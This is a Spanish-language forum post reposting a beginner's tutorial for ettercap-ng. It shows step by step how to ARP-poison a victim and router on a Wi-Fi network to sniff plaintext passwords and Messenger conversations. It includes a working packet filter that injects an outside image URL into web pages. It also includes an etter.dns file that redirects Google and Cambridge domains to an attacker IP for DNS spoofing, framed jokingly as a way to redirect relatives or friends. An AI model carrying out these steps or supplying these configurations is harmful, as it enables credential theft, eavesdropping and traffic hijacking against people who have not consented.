Hola Visitante

Autor Tema: manual de ettercap-ng para novatos  (Leído 9625 veces)

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
manual de ettercap-ng para novatos
« en: Julio 02, 2009, 07:54:43 pm »
lo pongo aqui porque es una aplicacion complementaria muy util

Intrusion en redes wireless y ataques en redes

Usando ettercap-ng 0.7.3



Bien, tengo la clave wep (de tu router por supuesto, estas en tu red wifi) ahora, ademas de navegar... que puedo hacer?? pues muchas cosas. veamos cuales son.


Ettercap

ettercap-ng es la mejor herramienta para usar en redes con Hub o switch, ya que te permite analizar el trafico que pasa por tu red. Poniendo en modo promiscuo la tarjeta de red Wireless o ethernet, seras capaz de ver conexiones tienen tus computadoras con el router y que trafico hay en ellas, con que ips conectan y que intercambian, en texto plano.

texto plano?? si, texto plano! son todos aquellos datos que viajan sin encriptacion, tales como algunas web, passwords, conversaciones de messenger, etc.

algo de teoria: Para sniffar correctamente, es necesario una victima y un router/switch, debes de envenenar las tablas cache de tu victima y de tu router, veamos un ejemplo:

tablas cache 192.168.1.45
192.168.1.254  00:44:66:55:33:55
192.167.1.23   00:11:22:33:44:55

tablas cache 192.168.1.254
192.168.1.45  22:33:55:46:66:77
192.167.1.23  00:11:22:33:44:55


estas, serian las tablas cache de tus equipos en red. vemos que hay IP/MAC.  De eso se encarga... ARP (Adress resolution protocol) de asegurarse que todo esto este correcto y funcionando. Veamos un ejemplo de ARP poisoning.

tablas cache de 192.168.1.45
192.168.1.254  00:22:33:44:55:66 <----mac del atacante simulando ser el router
192.167.1.23   00:11:22:33:44:55

tablas cache de 192.168.1.254
192.168.1.45 00:22:33:44:55:66 <-----mac del atacante simulando ser el cliente
192.167.1.23 00:11:22:33:44:55

y todo el trafico de tu red pasara por tu tarjeta de red. Veamoslo en la practica

instalamos ettercap desde synaptic (Ubuntu 9.04) o desde su fuente. No debemos olvidar que se ejecuta con permisos de root

y lo abrimos, una interfaz muy limpia y ordenada nos da la bienvenida:


vamos al menu sniff y seleccionamos Unified Sniffing. Este unified sniffing es para seleccionar la interfaz de la tarjeta de red que queremos que sniffe. (eth0 es para Ethernet y rausb0,wlan0,ath0 es para wifi) no esta de mas decirte que debes de estar asociado a la red que quieres sniffar




ya que empezamos, y ettercap acepto nuestra interfaz ahora lo que sigue:

Scaneo de host: scanear host significa que hara un scan de la gente conectada a tu red, independientemente de que sean WIFI o ethernet... lo he probado y funciona muy bien con wifi a ethernet

presionamos ctrl + S y aparecera la ventana que indica que esta sniffando hosts:



al terminar... presionamos H y nos apareceran los host de tu red, incluyendo en router, seleccionamos la victima y luego presionamos \"add to target 2\" y luego el router y presionamos \"add to target 1\"

veamos la interfaz y los botones



Teoria: en si, esto es para envenenar las tablas ARP de ambas victimas... el ataque se llama Man In The Middle y consiste en hacer pasar todo el trafico entre la victima y el router por nuestra tarjeta de red. Esto es que el trafico desde la victima sea dirigido a nuestra MAC, convenciendo a la victima que nosotros somos el router, y despues de \"analizarlo\" sea enviado al router... simulando ser el cliente victima, y viceversa.

ya que hemos seleccionado nuestra victima procedemos a envenenar sus arp:

Seleccionamos Mitm del menu de ettercap y luego le damos en ARP Poisoning, seleccionamos \"sniff remote connections\"

y le damos en aceptar, asi:




ahora solo es cuestion de presionar ctrl + W y empezar a sniffar

podemos ver el trafico que se genera en distintos puertos, presionando ctrl + c  y presionando enter podremos ver el trafico que circula en ese puerto.

Puertos para ver:

1863----> tios en el messenger
80----->tios viendo websites

presionando ctrl + o veremos las ips conectadas y su nombre de dominio.

veamos una captura normal... halle una password!!!  pero es la mia :(



veamos un trafico normal de un puerto, especificamente el 1863, para ver texto plano. Nota: no es muy efectivo en estos casos, ya que solo captura parte de la conversacion.



veamos para que otras cosas sirve ettercap-ng

filtros en ettercap


los filtros se encargan de analizar los paquetes y cuando ven una coincidencia, ejecutan una accion sobre el paquete, ya sea inyectarle algo, o quitarle algo, es muy util, cuando requerimos que no haya conexiones al puerto 23,445 u otros... o matar todas las conexiones cifradas al puerto 80...

veamos un ejemplo de filtro:

este un filtro; lo copian a /usr/share/ettercap y lo ponen como ig.txt:

Código: [Seleccionar]

############################################################################
#                                                                          #
#  hacked -- ig.filter -- filter source file                               #
#                                                                          #
#  By rockernault. based on code from ALoR & NaGA                          #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, \"Accept-Encoding\")) {
      replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
  # note: replacement string is same length as original string
      msg(\"zapped Accept-Encoding!\\\\n\");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace(\"img src=\", \"img src=\\\\\"http://img91.imageshack.us/img91/5052/xxxtqd.jpg\\\\\" \");
   replace(\"IMG SRC=\", \"img src=\\\\\"http://img91.imageshack.us/img91/5052/xxxtqd.jpg\\\\\" \");
   msg(\"Filter Ran.\\\\n\");
}


ahora, ya que lo copiaron a la ruta que les dije es cuestion de compilarlo

veamoslo en la terminal




en mi caso, el filtro lo genero en /home/user, pero si son root lo generara alli mismo

asegurense que el filtro, llamado \"filter.ef\"  este en la ruta donde estan todos los demas archivos (/usr/share/ettercap)

y solo es cuestion de aplicarlo, en el menu \"filter\" de ettercap  o presionando ctrl + F

y aparecera este ejemplo


si lo quieren desarmar es cuestion de presionar F

y eso es todo acerca de los filtros en ettercap.

DNS SPOOFIN'


las dns son como un anuario donde se guardan las relaciones IP/dominio... veamos algunos ejemplos...

192.35.46.45  www.seguridadwireless.net
74.35.34.52   www.google.com
18256.457.67 http//www.segtr.com

un spoofin es una creación de tramas TCP/IP con la ayuda de una dirección IP falsa. El generador del spoofing (ettercap-ng) trata de simular la identidad de otra máquina para redireccionarla a una pagina falsa u otra pagina

veamos como se hace.

editamos el fichero /usr/share/ettercap/etter.dns

y por ejemplo, para redireccionar google, asi quedaria el archivo:

Código: [Seleccionar]

############################################################################
#                                                                          #
#  ettercap -- etter.dns -- host file for dns_spoof plugin                 #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
#                                                                          #
# Sample hosts file for dns_spoof plugin                                   #
#                                                                          #
# the format is (for A query):                                             #
#   www.myhostname.com A 168.11.22.33                                      #
#   *.foo.com          A 168.44.55.66                                      #
#                                                                          #
# or for PTR query:                                                        #
#   www.bar.com A 10.0.0.10                                                #
#                                                                          #
# or for MX query:                                                         #
#    domain.com MX xxx.xxx.xxx.xxx                                         #
#                                                                          #
# or for WINS query:                                                       #
#    workgroup WINS 127.0.0.1                                              #
#    PC*       WINS 127.0.0.1                                              #
#                                                                          #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
#       so if you want to reverse poison you have to specify a plain       #
#       host. (look at the www.microsoft.com example)                      #
#                                                                          #
############################################################################

################################
# owned
#
#

http://www.cambridge.org  A  216.139.248.8
*.cambridge.org  MX 216.139.248.8
http://cambridge.org  PTR 216.139.248.8      # Wildcards in PTR are not allowed


[b]################################
# owned
#
#

www.google.com.mx  A  216.139.248.8
www.google.com   A   216.139.248.8
www.google.com.ar PTR  216.139.248.8      # Wildcards in PTR are not allowed
[/b]

##########################################
# no one out there can have our domains...
#

www.cambridge.org/touchstonearcade/  A 216.139.248.8
http://cambridge.org/touchstonearcade  A 216.139.248.8

###############################################
# one day we will have our ettercap.org domain
#

www.ettercap.org           A  127.0.0.1
ettercap.sourceforge.net   A  216.136.171.201

###############################################
# some MX examples
#

alor.org   MX  127.0.0.1
naga.org   MX  127.0.0.1

###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#

LAB-PC*  WINS  127.0.0.1

# vim:ts=8:noexpandtab


y es cuestion de reemplazar y/o añadir paginas para hacer pharmin' en tu red... redireccionando a tu hermano, amigo, pariente a una web.... y a ti...

ahora solo presionando ctrl + p y presiona enter en la linea donde dice DNS spoof  sends dns spoofed replies

como en la imagen




y eso es todo... el ettercap tiene mas usos... pero esos son los mas comunes...

Copyleft solo citenme!!


Post originalmetne escrito por rockernault
http://foro.seguridadwireless.net/manuales-wireless/manual-de-ettercap-ng-para-novatos/